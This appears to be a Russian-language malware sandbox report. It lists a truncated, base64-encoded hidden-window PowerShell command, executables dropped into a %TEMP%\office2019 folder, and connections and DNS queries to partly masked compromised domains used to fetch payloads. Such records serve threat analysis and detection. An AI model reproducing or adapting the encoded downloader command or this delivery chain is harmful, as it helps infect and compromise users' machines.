Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFAHIAcgAyADIAMwBrAD0AKAAnAEIAJwArACcANAAwADgAbAAnACsAJwBuADkAJwApADsAJgAoACcAbgAnACsAJwBlAHcALQBpAHQAJwArACcAZQBtACcAKQAgACQAZQBuAFYAOgB0AEUAbQBwAFwAbwBGAGYASQBDAGUAMgAwADEAOQAgAC0AaQB0AG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1448
- %TEMP%\1079370.cvr
- %TEMP%\office2019\pz6kc0.exe
- %TEMP%\office2019\pz6kc0.exe
- 'br###tmega.com':443
- 'ca###l.adv.br':80
- 'du###low.com':80
- 'du###low.com':443
- 'fl###ergast.dk':80
- http://ca###l.adv.br/css/wsF/
- http://www.du###low.com/wp-content/yvu1atyip7814/
- http://fl###ergast.dk/blogs/jdu6dq57246773/
- '34.##9.100.209':443
- 'br###tmega.com':443
- 'du###low.com':443
- DNS ASK co##############e-chains.prod.autograph.services.mozaws.net
- DNS ASK ca####shuasca.com
- DNS ASK se####eforlongi.com
- DNS ASK br###tmega.com
- DNS ASK ca###l.adv.br
- DNS ASK du###low.com
- DNS ASK em##shop.sk
- DNS ASK fl###ergast.dk
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFAHIAcgAyADIAMwBrAD0AKAAnAEIAJwArACcANAAwADgAbAAnACsAJwBuADkAJwApADsAJgAoACcAbgAnACsAJwBlAHcALQBpAHQAJwArACcAZQBtACcAKQAgACQAZQBuAFYAOgB0AEUAbQBwAFwAbwBGAGYASQBDAGUAMgAwADEAOQAgAC0AaQB0AG... (со скрытым окном)